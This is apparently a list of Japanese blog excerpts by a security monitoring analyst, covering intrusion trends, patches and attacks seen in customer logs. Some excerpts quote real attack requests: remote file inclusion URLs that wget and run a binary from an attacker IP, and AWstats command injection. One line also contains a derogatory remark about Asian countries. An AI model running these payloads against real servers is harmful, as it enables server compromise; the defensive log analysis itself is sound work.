スカッとゴルフ パンヤで有名なゲームポット社が改ざんされたらしいんですが、その調査結果が発表されてました。 【重要】ウェブサイト改ざんに関するお知らせ http://www.pangya.jp/board_notice_view.aspx?cat=1&seq=1580&num=0 7月5日（土）20:30から7月7…

会社の先輩に誘われるがままに、フォーラムに参加して来ました。こう言ったフォーラムに参加するのは初めてという素敵なアナリストですが、会場は始終笑いにつつまれていて楽しかったです。都合により2日目の午前中しか聞くことが出来なかったのですが、1日…

最近またSQL Injection攻撃が活発になって来ました。前は1つのIPから攻撃が来ていましたが、どうもウィルスに取り込まれたらしく手当たり次第に攻撃して来ている状態です。その数なんと4000IP強。とても対応しきれる数では無くなってきました。とりあえず今…

今月もパッチが出ているようなので、適用しませう。http://www.microsoft.com/japan/technet/security/bulletin/ms07-apr.mspx ただざっと眺めていると、MS07-022*1 の影響を受けるソフトウェアが一部間違っているような気が*2します。 *1:http://www.micros…

今日初めて知ったが、世の中の DDoS 攻撃には DRDoS というものがあるらしい。http://www.grc.com/dos/drdos.htm上記サイトの中央あたりの絵が分かりやすいが、TCP の3-way handshake *1を利用した攻撃。 もともとこういった攻撃があったのは知っていたが、D…

Hotmail の迷惑メールに Interop Tokyo 2007 の事前申し込みのメールが来ていました。 ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ Interop Tokyo 2007 6月13日（水）〜 6月15日（金）・幕張メッセ □■□ 事前登録開始のご案内 ■□■ 【事前登録で展示会入場料 3,000円…

本日、はてなのサービスを提供する2台のサーバーに、先週金曜日より不正な侵入が行われていたことが判明しました。 はてなでは本日午前4時頃にこの事実を認識し、午前6時頃に不正なアクセスの遮断を行いました。また、現在継続的に詳細な調査、対策を行って…

最優秀アンチウイルス・ソフトは「AntiVirusKit」，最下位は「Microsoft OneCare」*1より 調査は，各アンチウイルス・ソフトウエアの状態を2月2日時点の最新版に更新し，2月1日時点で既知のマルウエア100万種以上を検出できるかどうか確認した。 【ADVANCED…

P2PソフトShareの暗号を解析，ネットワーク可視化システムを開発 http://itpro.nikkeibp.co.jp/article/Watcher/20070122/259207/ だそうで、これからは Share にも捜査の手が伸びやすくなり、セキュリティベンダーもIDS、IPS用のシグネチャを出してくる可能…

http://www.itmedia.co.jp/enterprise/articles/0612/12/news040.html 自分がこの業界にいながら、ターゲット化についてはあまり知りませんでした。話には聞いていましたけど。 こういうボットを検知するにはどうすればいいんでしょうかね。やっぱり、企業に…

特定アジアから攻撃が急増します。

Apache に XSS の脆弱性が見つかり、影響範囲があまりに広いのでちょっとした騒ぎに。気になる方はバージョンアップを。 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3918 今回、影響を受けるのが "Expect:" というヘッダらしいが、まったく聞…

http://www.itmedia.co.jp/news/articles/0606/30/news020.html http://www.modernlifeisrubbish.co.uk/top-10-most-common-passwords.asp ちょっと古い記事ですが、RSS に引っかかっていたので読んでみた。簡単なパスワードや、思いつきやすいパスワードに…

http://sectools.org/ 知っているのが半分、まったく聞いた事がないのが半分と言うところでしょうか。 参考にして色々試してみたいかも。

先輩より、Windows Defender をインストールしてみて欲しいといわれたので、ラボの Windows2000 にインストールしてみた。以下そのときのメモ。 なお、Windows XP では若干違う可能性がありますのでご了承を。 1. GDI+ のインストール (正規品の認証あり) ht…

というのが公開されたそうです。 http://www.jnsa.org/result/2005/20060601_pol_01.pdf 中身を見ると、どのような経路で流失したか、被害規模はどれくらいかなど細かく書かれている。 はっきり言って専門外なので、これが正確なデータかは分からないが "3.3…

最近は webアプリケーションの脆弱性を狙った攻撃も落ち着いてきて、ログ解析がすこぶる楽になった。その代わりに、FTP サーバや SSH サーバに対するブルートフォース攻撃が目立つようになってきた。しかし目立つと言っても、攻撃を受けているお客さんはいつ…

@IT で見つけたこの記事。 また日本企業の94％、世界全体の84％が、サイバー犯罪において、単独犯のハッカーに代わり、高度な技術と知識を持つ組織的な犯罪集団が台頭していると回答した。さらに日本企業の60％、世界全体の63％が、途上国の無防備なシステム…

連休前だからかしらないが、中国から大量の SQL Injection を検知した。その際に IntruShield で検知した URL 要求や応答をお客様から一覧で見せて欲しいといわれたとき、簡単に出力するにはどうしたらいいのか。。。いろいろ考えてやったみた。その際にやっ…

ここ一ヶ月程、会社では下記のような通信で頭を悩まされる。 GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://xxx.xxx.84.10/heade.gif?&cmd=cd%20/tmp;wget%20xxx.xxx.84.10/chspsp;chmod%2…

ボーっとお客様のログを眺めていたら、こんなログがあった。 GET %2f%2f%2f%2f%2e%2f%2f%61%41%61%61%41%61%61%41%61%61%41%61%61%41%61%61%41%61%61%41%61%61%41%61%61%41%61%61%41%61%61%41%61%61%41%61%61%41%61%61%41%61%61%41%61%61%41%61%61%41%61%61%…

最近月1ぐらいのペースで、Cisco の脆弱性を狙った通信が多く発生している。先輩の話によると、昔は、Cisco の脆弱性が発表されたときに、このような通信が多く発生したとのことだが、今はそんなのお構いなしに飛んでくる。 内容としては、管理者権限で pwd …

最近、マビノギの話が続いたので本業の話でも。。。1週間ほど前から、OpenSSLの脆弱性をねらった通信が大幅に増えている。脆弱性自体は2002年のもので真新しいものではないが、成功すれば shell が取れるため、未だによくみかける。 OpenSSL 0.9.6d 以前のバ…

最近、下記のようなリクエストをよく見る。 GET /Forums/admin/admin_styles.phpadmin_styles.php?phpbb_root_path=http://81.174.26.***/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.***/criman;chmod%20744%20criman;./criman;echo%20YYY;echo| HTTP/1.1 GET…

どうも昨日から、1025/tcp のスキャンが増大している。スラドによるとDCOM の脆弱性を狙っているとのことだが、後日MS05-051 の脆弱性を狙ったものと判明した。下記にリンクをまとめておく。 1025/TCPのトラヒック増加 【情報】MS05-051への攻撃増加について…

昨日は AWstats の嵐だったが、今日は Put が小雨ながらもフィーバーしていた。今日のリクエストは下記の通り。 PUT /teste.html PUT /Spy.asp PUT /sik.htm PUT /xkla.htm PUT /x.htm PUT /imha.htm PUT /neo.htm PUT /hbr.htm PUT /home.htm PUT /testhost…

今週は AWstats がフィーバーしているらしく、下記のようなリクエストをレンジで打ってきている。 GET //cgi-bin/awstats/awstats.pl?configdir=|%20id%20| GET //cgi-bin/awstats.pl?configdir=|%20id%20| GET //cgi/awstats.pl?configdir=|%20id%20| GET /…

項目をセキュリティにしていいものか迷ったが、とりあえず関連することなのでセキュリティにしてみた。 すでに、ログ解析を始めて4ヵ月が経過した。処理にも慣れ、お客様のイベントの傾向に目を向ける余裕が出てきた。ここで、ふと変なことに気づいた。それ…

ネットワーク監視について早二ヶ月が立った。しかし、まだまだ覚えることは多くミスもある。 ただ、最近はイベントを見る余裕ができてきたため、*1処理する前に、どんな通信なのかじっくり見るようにしている。 ここ2日前から、AWStatsの脆弱性に対する攻撃…

ここのところ、海外からWebサーバに対して"Put"を使い、サイトの改ざんを狙った攻撃が非常多い。大体が、81.xx.xx.xx や 84.xx.xx.xx からやってくるようである。 Webページの改ざんには2種類あり、1つは価格.comや静岡新聞の一部のサイトがやられたように、…